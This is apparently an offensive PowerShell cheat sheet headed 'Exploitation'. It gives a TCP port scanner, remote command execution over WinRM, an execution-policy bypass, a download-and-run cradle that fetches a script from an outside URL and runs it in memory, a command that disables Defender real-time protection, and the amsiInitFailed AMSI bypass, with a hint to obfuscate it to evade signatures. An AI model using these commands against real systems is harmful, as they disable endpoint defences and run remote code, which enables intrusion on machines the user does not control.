
Exploitation

1) Port Scanning

# Connect-scan TCP 1-1024 on localhost with a 100 ms timeout; prints each port that accepted the connection
1..1024 | ForEach-Object { $sock = New-Object System.Net.Sockets.TcpClient; $async = $sock.BeginConnect('localhost', $_, $null, $null); $wait = $async.AsyncWaitHandle.WaitOne(100, $false); if ($wait -and $sock.Connected) { $_ }; $sock.Close() }

Replace 'localhost' with the target host. A 100 ms timeout is fine on a LAN but gives false negatives over slower links, and a full TCP connect is noisy: every hit shows up in the target's connection logs.
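
The one-liner above works but swallows connection errors, hard-codes the host and leaves the half-open socket unfinished. The function below is an added example, not code from the original page: it generalises the same connect-scan into a reusable cmdlet with a configurable host, port list and timeout, completes the connect with EndConnect, and emits objects that can be piped to Export-Csv. The function name Test-TcpPorts and the parameter names are my own choices.

```powershell
function Test-TcpPorts {
    <#
    .SYNOPSIS
        TCP connect scan of one host; emits one object per open port.
    .EXAMPLE
        Test-TcpPorts -ComputerName 10.0.0.5 -Port (22,80,443,445,3389,5985) -TimeoutMs 300
    #>
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [int[]]$Port = 1..1024,          # default mirrors the one-liner on this page
        [int]$TimeoutMs = 200
    )

    foreach ($p in $Port) {
        $client = New-Object System.Net.Sockets.TcpClient
        try {
            # Start the connect asynchronously so a filtered port cannot block the loop
            $async = $client.BeginConnect($ComputerName, $p, $null, $null)

            # WaitOne returns $false on timeout (filtered/dropped); Connected is $false on RST (closed)
            if ($async.AsyncWaitHandle.WaitOne($TimeoutMs, $false) -and $client.Connected) {
                $client.EndConnect($async)   # finish the handshake cleanly before closing
                [pscustomobject]@{
                    ComputerName = $ComputerName
                    Port         = $p
                    State        = 'Open'
                }
            }
        }
        catch [System.Net.Sockets.SocketException] {
            # Connection refused / reset surfaces here; treat as closed and move on
        }
        finally {
            $client.Close()
        }
    }
}

# Usage: scan the local host for a handful of common services and save the hits
Test-TcpPorts -ComputerName 'localhost' -Port (80, 135, 139, 443, 445, 3389, 5985) |
    Export-Csv -NoTypeInformation -Path .\open-ports.csv
```

Ports that time out and ports that answer with a reset are both silently dropped, so the output lists only confirmed-open ports; if you need to distinguish filtered from closed, return an object in the timeout and catch branches too.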

2) Remote Command Execution

Invoke-Command -ComputerName TargetPC -ScriptBlock { whoami } -Credential (Get-Credential)

Uses PowerShell Remoting, so WinRM must be listening on the target (TCP 5985, or 5986 for HTTPS) and the supplied account must be a local administrator or a member of Remote Management Users. Get-Credential prompts interactively; build a PSCredential object beforehand for unattended use.

3) Bypass Execution policy

Set-ExecutionPolicy Bypass -Scope Process -Force; .\script.ps1

Execution policy is not a security boundary, only a guard against running scripts by accident. -Scope Process changes it for the current session only and leaves the machine-wide setting untouched, so nothing persists or needs reverting.

4) Execute remote scripts

$url = 'http://example.com/script.ps1'; Invoke-Expression (New-Object Net.WebClient).DownloadString($url)

Fetches the script over HTTP and runs it from memory without writing a .ps1 to disk. The content is still passed to AMSI when Invoke-Expression evaluates it, and the request honours the current user's proxy settings, so it is visible to a web proxy and to script block logging (event 4104) on the host.

5) Disable Windows Defender

Set-MpPreference -DisableRealtimeMonitoring $true

Requires an elevated shell. With Tamper Protection enabled the call fails with an access-denied error, and when it succeeds Defender records event 5001 (real-time protection disabled) in the Microsoft-Windows-Windows Defender/Operational log.

6) Bypass AMSI

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Sets the private static amsiInitFailed flag so the current PowerShell process behaves as if AMSI initialisation failed and stops submitting script content for scanning. The change is per-process, so it must be repeated in every new shell, and Defender signatures match this exact string, so on a current build it is usually blocked before it executes unless the text is obfuscated.
